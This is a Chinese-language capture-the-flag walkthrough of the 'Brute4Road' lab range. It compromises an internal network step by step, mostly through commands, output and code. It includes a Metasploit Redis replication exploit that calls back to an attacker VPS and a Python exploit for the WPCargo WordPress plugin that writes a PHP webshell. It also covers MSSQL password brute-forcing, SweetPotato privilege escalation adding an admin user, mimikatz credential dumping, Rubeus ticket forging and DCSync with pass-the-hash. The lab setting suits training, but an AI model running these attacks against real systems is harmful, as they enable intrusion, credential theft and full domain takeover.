打靶记录(五三)之春秋云境Brute4Road

端口初扫描

sudo nmap --min-rate 10000 -p- 39.99.225.224
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-20 15:59 UTC
Nmap scan report for 39.99.225.224
Host is up (0.0086s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.53 seconds

sudo ./fscan_386 -h 39.99.225.224
[sudo] mikannse 的密码：

___                              _

  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.225.224   is alive
[*] Icmp alive hosts len is: 1
39.99.225.224:80 open
39.99.225.224:6379 open
39.99.225.224:21 open
39.99.225.224:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.225.224      code:200 len:4833   title:Welcome to CentOS
[+] Redis:39.99.225.224:6379 unauthorized file:/usr/local/redis/db/dump.rdb
[+] ftp://39.99.225.224:21:anonymous 
   [->]pub

Redis未授权（初始shell）

感觉春秋的靶机nmap扫描结果不是很准确，也许需要修改一下一贯的参数了

有个Redis未授权，可以不需要密码访问开设在外网的redis服务器

msf启动！

use exploit/linux/redis/redis_replication_cmd_exec

set rhost 39.99.225.224
rhost => 39.99.225.224
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set lhost 156.224.26.164
lhost => 156.224.26.164
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set srvhost 156.224.26.164
srvhost => 156.224.26.164
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

直接一把梭了

发现我们是redis用户

直接找SUID（SGID）

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

有一个base64SUI

读取flag1

base64 "/home/redis/flag/flag01" | base64 --decode

flag{2bba2991-ab3d-4aea-965e-628a4e514759}

横向移动

上传一个fscan,meter里可以直接upload

fscan_386

传的稍微有点慢，但是不要紧

ip a

172.22.2.7/16,网段是172.22.0.0

./fscan_386 -h 172.22.0.0/16

但是不知道为什么一直扫不出来，结果看WP都是扫的/24

./fscan_386 -h 172.22.2.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.18     is alive
[*] Icmp alive hosts len is: 3
172.22.2.16:1433 open
172.22.2.18:445 open
172.22.2.16:445 open
172.22.2.18:139 open
172.22.2.16:139 open
172.22.2.16:135 open
172.22.2.18:80 open
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.7:22 open
172.22.2.7:6379 open
[*] alive ports len is: 12
start vulscan
[*] NetInfo:
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] WebTitle: http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetBios: 172.22.2.18     WORKGROUP\UBUNTU-WEB02         
[*] NetBios: 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393 
[*] 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点

结果非常快就出来了

内网穿透

试着用msf搭建socks代理

meter下:

route查看路由：172.22.0.0

但是这里路由要设置为172.22.2.0，MD设置成172.22.0.0不行，直接白给，试了一堆方式穿透，最后还是用回msf来内网穿透

run autoroute -s 172.22.2.0

background

use auxiliary/server/socks_proxy

直接run,默认端口是1080，在vps中ss -tlnp看到1080端口正在监听

proxychasin做个代理

proxychains wpscan --url http://172.22.2.18

发现一个wpcargo插件

import sys
import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

上exp，会自动生成一句话木马，蚁剑开个代理直接连

http://172.22.2.18/webshell.php?1=system，

密码是2,并且连接类型要设置为CMDLINUX

/var/www/html/wp-config.php目录找到数据库的敏感信息

define( 'DB_NAME', 'wordpress' );


/** Database username */

define( 'DB_USER', 'wpuser' );


/** Database password */

define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

在蚁剑的数据管理中能添加连接

找到第二个flag

flag{c757e423-eb44-459c-9c63-7625009910d8}

MSSQL

发现还有一个表的名字是：“S0meth1ng_y0u_m1ght_1ntereSted”

导出成字典

用fscan爆破，

proxychains ./fscan -h 172.22.2.16 -m mssql -pwdf 1.txt

得到ElGNkOiC，

利用MDUT连接，要激活Old Auto…那个组件

发现也是有模拟令牌的权限，然后上传SweetPotato

发现不能直接读取flag，添加个admin用户

C:/Users/Public/SweetPotato.exe -a "net user mikannse qwer1234! /add"

C:/Users/Public/SweetPotato.exe -a "net localgroup administrators mikannse /add"

我用的是xfreerdp，远程连接172.22.2.16，找到第三个flag

flag{e90abf17-d2b0-4070-a3e6-ce20c13c625a}

域控渗透

proxychains xfreerdp /v:172.22.2.16 /u:mikannse /p:qwer1234! /cert-ignore /drive:share1,/tmp

直接开启共享，然后上传一个mimikatz,以管理员身份运行

privilege::debug 

sekurlsa::logonpasswords

找到MSSQLSERVER$用户的哈希

不懂了，直接抄WP

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:1400900feabf5d233a9c1ec534105274 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jomeuPBK3C69yaGuyDCLGYHRyVjZg4zXrEwUSwvFS0kZ+4Q2uTcKGqYw3GLs5sf0/MJ0fHiL1V8u5WrLpgR5hBlYUGN+g1zmv3uiTXO7QobxH0lR0dUUKuNdPoxdPdx26Liz5/xdDFvz4xTyMKDqqRxgBWquqGjh1cp/woy4U4tXJo+L8CfQ424Kgdb3n/rJYRNY54m8QHl/smHg3PpMgTT2FEiJ5Jag+qDpM/R/XUOIJHNzSfCVi2XiLGqPF374jUbih9UTZvlqRoSHz9qljZlBsEAqen9ctu01tmNn4ACRz4mqMV11MyV9scfeJnQbCpGdS+zveSrT53dwFotrg00o4Jq6RGr9dR/6ZMKC1W/kfwSXdF1b/H3HOMM7HzK0qLfSbDtq8i1e2FdZ5kyOVbbtAE6irAizzK7ScDS4rO9RRSDl6BNaV25nkjce6j9dj4V56ua1Gh+F+JQfAHbE8zLNt9OmseJs6IGj/cxKEckbhcggGhQhL3c6k1FKZOTXY1PKR8zweZauWgK7FXiDLEP1h6YwP2S/frDmKRb5mCdBUUQBzsA/6BBmEAnxvfKX1B8xViT0rq1I/pLKS9LKWTKyuHJd67z6XDRN7IWR0fstyqGuvHPn391l02zNUJRK5/7jyOyKwhQ3sb/XRzC4YbLeGgImMGRZ0fqrQ+hRBQbTuNr2/i4hgyWDLuBSEvz5qb1kXcebRkWuCHhpGKtsdbyZ30tnpA0W2qWu8qJ8zKks04r2Hj91lCPudAbrjhjjFf/UNd+fHcfYlAu0xzMuR8eKUA22Lcv0fEf2igvIu38bCRvUjfGkh423fgPsR4Xom8/8lNWhU+kaAiGSwSER8UGr8jiDVjtmgF5ScFoQDM+kVJ5o0ZnettUHJhcVMAdlI1QTq5WjQRIea6u4d6bYSHI43ips6So8hEcsB/03FpOKR/SRUYveALw3IAwAJtAPtW/SrzUeLXEemVg2aADTl1qXNw04A0e9v8XQnnm7lyCJfmI3pXJVsycjJyviDwazFtHGbQoM3fhlZ4zpBlfBKagxQr624YO5yIaJbl9/Dp4M7iauUIbo7kAWCfka1iafKyGDFGAXudAb52dt72jw0/QpeLP08RORDLtY8IrpjKAzHsSGuVYukY07lR+ck95MeKFDnl8cwaKw0MB8f92n4g4OfWQbUJK/479LYMZBDG38iwHHv/MLiaCylHm5nazaY0JJxJ2CeqIvsAFlfm7gp23V5Hj/T+eKt0zd3EIjNhuwBvhYeVKKQCFJZGaRelQKxaptmKhhgILA+wTKvCxpQX6qx8b40pg9r1rr4zQ9buPb4JNnqwHe5SIgPURR02Xv5FUiiI9Qc5//bUhxCEOXi0TFASRbghAyNA/TLRVAqfvtgqv6SKb4jw265bdrQQrPITm1En79jsNw6adH1curFJr++PS6ZYX6yqK3DlJ5Piiy2OAVLPIPcN1zmbZ+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBBAXgLFznI5hHEOCpAjFdNEoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIyMTAyODEyMjIzM1qmERgPMjAyMjEwMjgyMjIyMzNapxEYDzIwMjIxMTA0MTIyMjMzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

扩展管理员对域控的权限

然后

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

获取域控管理员的权限

proxychains wmiexec.py -hashes 00000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 Administrator@172.22.2.3

第四个flag

flag{b8fee5ad-a9c7-48ec-9ad1-d24350b1a055}

碎碎念

这个房间真的让我试了好几种内网穿透的方式，也对内网穿透越来越熟练了。虽然说后面的域控完全不太会，哎